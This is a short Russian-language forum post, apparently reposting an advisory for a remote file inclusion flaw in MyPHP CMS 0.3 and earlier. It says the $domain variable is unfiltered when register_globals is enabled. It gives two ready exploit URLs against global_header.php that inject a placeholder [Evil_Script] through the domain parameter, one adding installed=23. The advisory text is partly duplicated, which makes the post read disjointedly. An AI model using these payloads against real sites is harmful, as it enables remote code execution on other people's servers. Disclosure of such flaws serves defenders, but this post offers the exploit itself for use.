и снова Kw3[R]Ln..
MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerabili
Описание:
переменная $domain не фильтруется.Когда register_globals=on, то есть возможность использовать эту уязвимость с помощью php injection скрипта.
Пример/эксплоим:
сначала было вот так...
но потом изменилось вот так:
MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerabili
Описание:
переменная $domain не фильтруется.Когда register_globals=on, то есть возможность использовать эту уязвимость с помощью php injection скрипта.
Пример/эксплоим:
сначала было вот так...
Код:
http://www.site.com/[path]/styles/default/global_header.php?domain=[Evil_Script]
Код:
http://www.site.com/[path]/styles/default/global_header.php?installed=23&domain=[Evil_Script]